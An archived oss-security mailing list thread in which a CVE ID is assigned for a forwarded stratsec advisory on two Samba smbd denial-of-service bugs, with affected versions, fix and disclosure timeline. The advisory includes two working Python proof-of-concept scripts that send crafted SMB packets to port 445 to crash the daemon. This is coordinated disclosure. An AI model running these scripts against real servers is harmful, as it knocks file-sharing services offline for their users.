Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Date: Tue, 25 May 2010 13:53:46 -0400 (EDT)
From: Josh Bressers <bressers@...hat.com>
To: oss-security@...ts.openwall.com
Cc: coley@...re.org
Subject: Re: Fwd: [Full-disclosure] stratsec Security
 Advisory SS-2010-005: Samba Multiple DoS Vulnerabilities

Please use CVE-2010-1635

Sorry for the delay, I've been out for a few days.

-- 
    JB


----- "Thomas Biege" <thomas@...ell.com> wrote:

> So far no assignments were made, right?
> 
> Am Donnerstag 20 Mai 2010 16:17:48 schrieb Thomas Biege:
> > Hello oss-security,
> > was a CVE-ID assigned for this issue already?
> > 
> > Thanks,
> > Thomas
> > 
> > 
> > ----------  Forwarded Message  ----------
> > 
> > Subject: [Full-disclosure] stratsec Security Advisory SS-2010-005:
> Samba
> > Multiple DoS Vulnerabilities
> > Date: Mittwoch 12 Mai 2010, 09:00:07
> > From: stratsec Advisories <advisories@...atsec.net>
> > An:  "full-disclosure@...ts.grok.org.uk"
> > <full-disclosure@...ts.grok.org.uk>
> > 
> >
> ===========================================================================
> > ==== stratsec Security Advisory: SS-2010-005
> >
> ===========================================================================
> > ====
> > 
> > Title:           Samba Multiple DoS Vulnerabilities
> > Version:         1.0
> > Issue type:      Multiple
> > Affected vendor: Samba
> > Release date:    12/05/2010
> > Discovered by:   Laurent Gaffié
> > Issue status:    Patch available
> > 
> >
> ===========================================================================
> > ====
> > 
> > Summary
> > -------
> > 
> > Two vulnerabilities were discovered within in the Samba Smbd daemon
> which
> > allow
> > an attacker to trigger a null pointer dereference or an
> uninitialized
> > variable read by sending a specific 'Sessions Setup AndX' query.
> > Successful exploitation
> > of these issues will result in a denial of service.
> > 
> > Description
> > -----------
> > 
> > The Server Message Block (SMB) protocol, also known as Common
> Internet File
> > System (CIFS) acts as an application-layer protocol to provide
> shared
> > access to
> > files, printers and Inter-Process Communication (IPC). It is also a
> > transport for Distributed Computing Environment / Remote Procedure
> Call
> > (DCE / RPC) operations. After negotiating an SMB communication the
> client
> > sends a 'Session Setup AndX' packet to negotiate a session in order
> to be
> > able to connect on a specific share.
> > 
> > To trigger the null pointer dereference, the client needs to send a
> crafted
> > SMB
> > 'Negotiate Protocol' query with the SMB header 'Flags2' set to
> '0x0003'
> > (no Unicode), followed by a Session Setup AndX request with the SMB
> header
> > 'Flags2' set to '0x8003' (Unicode). This sequence will result in a
> crash
> > within
> > the Smbd process.
> > 
> > The uninitialised Variable Read issue, can be triggered if the
> client sends
> > a crafted 'Session Setup AndX' with a 'security blob length' value
> set to
> > '\xff\xff'.
> > 
> > Impact
> > ------
> > 
> > A remote attacker can cause a denial of service within the Samba
> daemon
> > 
> > Affected products
> > -----------------
> > 
> > Samba <=3.4.7 and Samba <= 3.5.1
> > 
> > Proof of concept
> > ----------------
> > 
> > To trigger the uninitialised variable read issue, the following
> Python
> > proof of concept is available:
> > 
> > import sys,socket
> > from socket import *
> > 
> > if len(sys.argv)<=1:
> >  sys.exit('Usage: python smbd.py 10.0.0.12')
> > 
> > host = sys.argv[1],445
> > 
> > packetnego=(
> > "\x00\x00\x00\xaa"
> > "\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x03\x00\x00\x00\x00\x00"
> > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00\x00"
> > "\x00\x87\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
> > "\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x1a\x45\x4e\x49"
> > "\x58\x20\x43\x4f\x52\x45\x00\x02\x4d\x49\x43\x52\x4f\x53\x4f\x46"
> > "\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x31\x2e\x30\x33\x00"
> > "\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64"
> > "\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75"
> > "\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30"
> > "\x30\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e"
> > "\x54\x20\x4c\x4d\x20\x76\x2e\x31\x32\x00"
> > )
> > 
> > payload=(
> > "\x00\x00\x01\xa3"
> > "\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x03\x80\x00\x00\x00\x00"
> > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> > "\x00\x41\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> > "\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00"
> > "\x00\x0d\x75\x00\xd6\x00\x04\x11\x0a\x00\x00\x00\x00\x00\x00\x00"
> > "\x18\x00\x18\x00\x00\x00\x00\x00\xd4\x00\x00\x00\x99\x00\x36\xed"
> > "\x7f\xf4\x6b\xeb\x15\x65\x2e\xb5\xc9\x70\xbe\x39\xfa\x89\x56\x5b"
> > "\xb0\xc2\x56\x40\x11\x6c\xe6\x33\x1e\x93\x02\xd3\xd3\x2e\x17\xad"
> > "\x1f\x37\x23\xcf\x7e\x4c\xd7\x64\xbe\xd5\xdc\x1f\x23\xe0\x69\x41"
> > "\x00\x64\x00\x6d\x00\x69\x00\x6e\x00\x69\x00\x73\x00\x74\x00\x72"
> > "\x00\x61\x00\x74\x00\x65\x00\x75\x00\x72\x00\x00\x00\x4e\x00\x54"
> > "\x00\x34\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77"
> > "\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x31\x00\x33\x00\x38"
> > "\x00\x31\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
> > "\x00\x77\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x34\x00\x2e"
> > "\x00\x30\x00\x00\x00\x00\x00\x04\xff\x00\x00\x00\x00\x00\x01\x00"
> > "\x31\x00\x00\x5c\x00\x5c\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31"
> > "\x00\x36\x00\x38\x00\x2e\x00\x30\x00\x2e\x00\x31\x00\x30\x00\x34"
> > "\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f"
> > "\x3f\x3f\x00"
> > )
> > 
> > s = socket(AF_INET, SOCK_STREAM)
> > s.connect(host)
> > s.send(''.join(packetnego))
> > s.send(''.join(payload))
> > 
> > 
> > To trigger the null pointer dereference issue this Python proof of
> > concept is available:
> > 
> > import sys,socket
> > from socket import *
> > 
> > if len(sys.argv)<=1:
> >  sys.exit('python smbd.py 10.0.0.12')
> > 
> > host = sys.argv[1],445
> > 
> > packetnego=(
> > "\x00\x00\x00\x85"
> > "\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8\x00\x00\x00\x00"
> > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00"
> > "\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
> > "\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4c\x41\x4e\x4d"
> > "\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66"
> > "\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e"
> > "\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
> > "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c\x4d\x20"
> > "\x30\x2e\x31\x32\x00"
> > )
> > 
> > payload=(
> > "\x00\x00\x00\xec"
> > "\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00"
> > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x40\x00"
> > "\x0c\xff\x00\xec\x00\x04\x11\x32\x00\x00\x00\x00\x00\x00\x00"
> > "\xff\xff"  ## Security blob set to \xff\xff here
> > "\x00\x00\x00\x00\xd4\x00\x00\xa0\xb1\x00\x60\x48\x06\x06\x2b"
> > "\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b"
> > "\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c"
> > "\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00"
> > "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28"
> > "\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00"
> > "\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00"
> > "\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00"
> > "\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00"
> > "\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00"
> > "\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00"
> > "\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"
> > )
> > s = socket(AF_INET, SOCK_STREAM)
> > s.connect(host)
> > s.send(''.join(packetnego))
> > s.send(''.join(payload))
> > 
> > Solution
> > --------
> > 
> > Update to version 3.5.2 or 3.4.8 (http://samba.org/)
> > 
> > Response timeline
> > -----------------
> > 
> > * 09/03/2010 - Null pointer dereference issue reported to vendor.
> > * 09/03/2010 - Vendor acknowledges receipt of advisory 2 hours
> after
> >                receiving the initial email
> > * 09/03/2010 - Vendor confirms issue presence, and provide a patch
> 3
> >                hours after receiving the initial email.
> > * 09/03/2010 - stratsec confirms patch resolves issue.
> > * 15/03/2010 - Uninitialised Variable Read issue reported to
> vendor.
> > * 15/03/2010 - Vendor confirms the issue and provides a patch 5
> hours
> >                after receiving the initial email.
> > * 15/03/2010 - stratsec confirms patch resolves issue
> > * 07/04/2010 - Version 3.5.2 released by the vendor fixing both
> issues.
> > * 11/05/2010 - Version 3.4.8 released by the vendor fixing both
> issues.
> > * 12/05/2010 - This advisory published.
> > 
> > References
> > ----------
> > * Vendor advisory: http://samba.org/samba/history/samba-3.4.8.html
> > * https://bugzilla.samba.org/show_bug.cgi?id=7254
> > * stratsec would like to thanks the Samba Security Team for their
> >   responsiveness while handling theses issues
> > 
> >
> ===========================================================================
> > ====
> > 
> > About stratsec
> > --------------
> > stratsec, specialises in providing information security consulting
> and
> > testing services for government and commercial clients. Established
> in
> > 2004, we are now one of the leading independent information
> security
> > companies in the Australasian and SE-Asian region, with offices
> throughout
> > Australia and in Singapore and Malaysia.
> > 
> > For more information, please visit our website at
> http://www.stratsec.net/
> > 
> >
> ===========================================================================
> > ====
> 
> -- 
>  Thomas Biege <thomas@...ell.com>, SUSE LINUX, Security Support &
> Auditing
>  SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.